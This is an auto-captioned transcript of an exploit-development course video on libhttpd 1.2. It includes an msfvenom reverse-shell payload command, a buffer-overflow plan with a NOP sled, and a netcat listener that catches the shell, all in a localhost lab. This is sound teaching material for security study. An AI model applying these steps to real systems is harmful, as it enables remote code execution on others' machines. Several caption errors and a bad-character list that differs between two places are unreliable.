1
00:00:00,270 --> 00:00:02,670
Okay, everybody, welcome back to Exploit Development.

2
00:00:02,670 --> 00:00:08,130
We're about to start our most exciting part of libhttpd: the exploitation process.

3
00:00:08,670 --> 00:00:12,030
And I already tested the shellcode before, so it works.

4
00:00:12,450 --> 00:00:17,760
But let's just review the msfvenom payload generation script.

5
00:00:18,480 --> 00:00:28,110
So we're going to run msfvenom -p, reverse shell, connect back to localhost, port 4444, format

6
00:00:28,110 --> 00:00:39,210
python, eliminate the bad characters 09, 0a, 0d, 22 and 3F, and then platform Linux, architecture x86, encoder.

7
00:00:39,720 --> 00:00:47,380
Now let me talk to you about encoders, because encoders are basically a very important part of our shell

8
00:00:47,400 --> 00:00:47,760
code.

9
00:00:47,970 --> 00:00:53,580
Now, you would be under the assumption that it can be obvious and generated.

10
00:00:53,970 --> 00:00:59,280
You'll be under the assumption that msfvenom generates raw assembly shellcode.

11
00:00:59,610 --> 00:01:01,130
That's far from the truth.

12
00:01:01,150 --> 00:01:11,550
You need to protect your encoder, because within the first 16 bytes of the shellcode

13
00:01:12,150 --> 00:01:19,020
it actually encodes your assembly code and operands to force execution to get back, to get

14
00:01:19,020 --> 00:01:21,330
past with no mitigation measures.

15
00:01:21,750 --> 00:01:28,680
So in order to prevent this from being overwritten, we need to add a NOP sled. A NOP

16
00:01:28,680 --> 00:01:30,780
is basically 0x90.

17
00:01:30,780 --> 00:01:35,730
It does nothing except serve as a shield for the rest of the shellcode.

18
00:01:36,030 --> 00:01:39,930
If you overwrite, let's see, 0xB right here,

19
00:01:40,230 --> 00:01:41,280
the shellcode breaks.

20
00:01:43,430 --> 00:01:48,800
So you need to add a protective NOP sled. So now, our first try.

21
00:01:51,150 --> 00:01:52,110
Let's copy this.

22
00:01:56,160 --> 00:02:03,720
And then notice here that we have 16 NOPs (no operation) to protect the shellcode.

23
00:02:04,020 --> 00:02:09,930
Now we don't have to worry about the seals anymore because, as we previously discovered, the buffer

24
00:02:09,960 --> 00:02:18,810
is so large and this program so easily exploitable that we have a mass of length, just to stick in our

25
00:02:18,810 --> 00:02:19,410
shellcode.

26
00:02:20,520 --> 00:02:22,740
So we don't have much of an issue here.

27
00:02:22,770 --> 00:02:24,970
But once we go into a hundred years, we will tell.

28
00:02:25,080 --> 00:02:29,370
We'll talk about limited buffer space, but that's a different section of the class.

29
00:02:29,820 --> 00:02:36,210
So what I want you to do is run that command, which was

30
00:02:42,150 --> 00:02:46,650
msfvenom -p linux/x86/shell_reverse_tcp.

31
00:02:46,950 --> 00:02:48,270
LHOST equals localhost.

32
00:02:48,420 --> 00:02:52,410
LPORT is 4444, format is python, bad bytes.

33
00:02:52,410 --> 00:03:00,120
Remember there are six of them: 09, 0a, 0d, 22, 2F and 3F. Platform is Linux.

34
00:03:01,080 --> 00:03:09,000
Architecture is x86 and the encoder is shikata_ga_nai, which I believe means "all is lost", because at

35
00:03:09,000 --> 00:03:13,620
the time that this encoder came out, there were actually no mitigations against it.

36
00:03:13,950 --> 00:03:16,290
And then we gave it the variable name shellcode.

37
00:03:20,290 --> 00:03:21,070
So let's see.

38
00:03:21,070 --> 00:03:22,180
The earth is correct.

39
00:03:22,840 --> 00:03:24,200
So we overflow.

40
00:03:24,310 --> 00:03:35,080
We overflowed our application with a POST request of 1048, a jump instruction, with a protective

41
00:03:35,080 --> 00:03:40,090
buffer of 16 NOPs to protect our shellcode, which is 95 bytes long.

42
00:03:45,440 --> 00:03:53,120
So clear the debugger and run esp 8080.

43
00:03:54,410 --> 00:03:57,810
Split your screen, and netcat.

44
00:03:58,460 --> 00:04:02,150
This is to catch a shell: netcat -nvlp 4444.

45
00:04:03,830 --> 00:04:05,000
Split the screen again.

46
00:04:06,450 --> 00:04:07:200
Python.

47
00:04:07,530 --> 00:04:09,060
first_try.py.

48
00:04:10,740 --> 00:04:14,370
Ctrl+C to exit out of it, and we get a connect and a shell.

49
00:04:15,060 --> 00:04:19,050
So this doesn't look like a shell under normal circumstances.

50
00:04:19,050 --> 00:04:22,710
But to verify that it's a shell, type whoami,

51
00:04:24,790 --> 00:04:27,070
id, uname.

52
00:04:28,330 --> 00:04:29,320
Congratulations.

53
00:04:29,320 --> 00:04:34,120
You have just passed the first section of the course, which is libhttpd 1.2.

54
00:04:34,690 --> 00:04:42,940
And you have just gained a root-level shell within a 32-bit image of Kali Linux using libhttpd

55
00:04:42,940 --> 00:04:43,630
1.2.

56
00:04:44,110 --> 00:04:49,840
Thank you for your time and get ready for the next section, which is SLMail 5.5. That is a Windows

57
00:04:49,840 --> 00:04:54,790
exploit, so you will need a Windows XP, Vista or 7 with SLMail installed.

58
00:04:55,090 --> 00:04:58,090
Please refer to the installation videos.

59
00:04:58,840 --> 00:04:59,740
Thank you for your time.